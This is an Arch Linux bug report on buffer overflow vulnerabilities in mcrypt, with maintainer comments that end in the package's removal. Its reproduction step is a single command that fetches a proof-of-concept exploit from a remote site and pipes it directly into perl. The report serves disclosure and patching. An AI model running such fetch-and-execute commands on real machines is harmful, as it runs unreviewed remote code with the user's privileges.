FS#32877 - [mcrypt] multiple security issues

Attached to Project: Arch Linux
Opened by Jens Adam (byte) - Tuesday, 27 November 2012, 09:30 GMT
Last edited by Jan de Groot (JGC) - Thursday, 04 July 2013, 11:12 GMT
Task Type: Bug Report
Category: Upstream Bugs
Status: Closed
Assigned To: Pierre Schmitz (Pierre), Roman Kyrylych (Romashka)
Architecture: All
Severity: High
Priority: Normal
Reported Version:
Due in Version: Undecided
Due Date: Undecided
Percent Complete: 100%
Votes: 0
Private: No

Details

Description:
"mcrypt versions 2.6.8 and below suffer from a vulnerability that is caused due to a boundary error in the processing of an encrypted file, which can be exploited to cause a stack-based buffer overflow when a user opens a specially crafted .nc file. Successful exploitation could potentially allow execution of arbitrary code on the affected machine."
Source: http://packetstormsecurity.org/files/116268/mcrypt-2.6.8-Buffer-Overflow-Proof-Of-Concept.html
Links: http://security-tracker.debian.org/tracker/CVE-2012-4409

Steps to reproduce:
$ cd /tmp && curl -s http://dl.packetstormsecurity.net/1211-exploits/mcrypt-overflow.txt | perl && mdecrypt fake.nc

Our default build flags with stack protection will catch this, but a patch would be in order nonetheless.


Upon further investigation there are more issues:
http://security-tracker.debian.org/tracker/CVE-2012-4426 - already discussed and patched in the original thread starting at http://www.openwall.com/lists/oss-security/2012/09/06/1
http://security-tracker.debian.org/tracker/CVE-2012-4527 - another overflow regarding file names, source: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-4527

Patches and updated PKGBUILD attached.

Closed by Jan de Groot (JGC)
Thursday, 04 July 2013, 11:12 GMT
Reason for closing: Won't fix
Additional comments about closing: mcrypt was removed from repository.

Comment by Jens Adam (byte) - Tuesday, 27 November 2012, 09:38 GMT
... and before the question comes up: Upstream is considered dead.

Comment by Daniel Micay (thestinger) - Thursday, 27 December 2012, 19:09 GMT
Perhaps this package should just be dropped then? There are lots of alternatives.

Comment by Adam Young (atyoung) - Thursday, 31 January 2013, 07:18 GMT
Better to move this over to the community if they have packages that require it, as it's orphaned so to speak.

Comment by Jens Adam (byte) - Thursday, 31 January 2013, 15:42 GMT
What's the problem here?
There has been no further development on the net on this issue afaik, all other distributions had already applied the patches before I posted this here, the issue is four months old, and above is a ready-to-go PKGBUILD.
I don't care at all about mcrypt, its usefulness or upstream maintenance, but as long as packages contain security problems, we patch them, minor/obscure or not.
So: patch it, or drop it.

Comment by Pierre Schmitz (Pierre) - Thursday, 31 January 2013, 19:33 GMT
I just removed the package from the repos as it is not needed by anything. It is still in svn though so it can easily be pushed back if needed.
